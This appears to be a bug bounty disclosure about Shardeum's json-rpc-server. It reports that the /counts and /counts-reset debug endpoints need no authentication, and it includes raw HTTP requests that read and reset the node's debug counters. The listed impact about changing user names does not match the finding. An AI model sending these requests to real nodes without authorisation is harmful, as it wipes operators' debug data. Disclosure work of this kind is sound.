#35598 [W&A-Insight] Access to debug endpoints without any protection
PreviousShardeum Ancillaries IINext#35351 [W&A-Insight] Password Length Bypass in Shardeum Authentication System
Was this helpful?
Was this helpful?
Submitted on Sep 30th 2024 at 10:56:08 UTC by @blocksmith0 for
Report ID: #35598
Report Type: Websites and Applications
Report severity: Insight
Target: https://github.com/shardeum/json-rpc-server/tree/dev
Impacts:
Changing non-sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction: Changing the first/last name of user, Enabling/disabling notifications
The following debug endpoints are available without any kind of protection like authentication which enables general public to get access to these endpoints.
This enables anyone to wipe out debug data of any archiver/node on the network.
GET `/counts` this endpoint emits the nestedCounters report as an array.
GET `/counts-reset` this endpoint resets the internal nestedCounters object.
To get nestedCounters do GET request to the archiver/node.
http://127.0.0.1:4000/counts
Request:
``` GET /counts HTTP/1.1 Host: 127.0.0.1:4000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ar;q=0.7 Connection: close ```
To reset or clear internal nestedCounters do the following GET request to the archiver/node.
http://127.0.0.1:4000/counts-reset
``` GET /counts-reset HTTP/1.1 Host: 127.0.0.1:4000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ar;q=0.7 Connection: close ```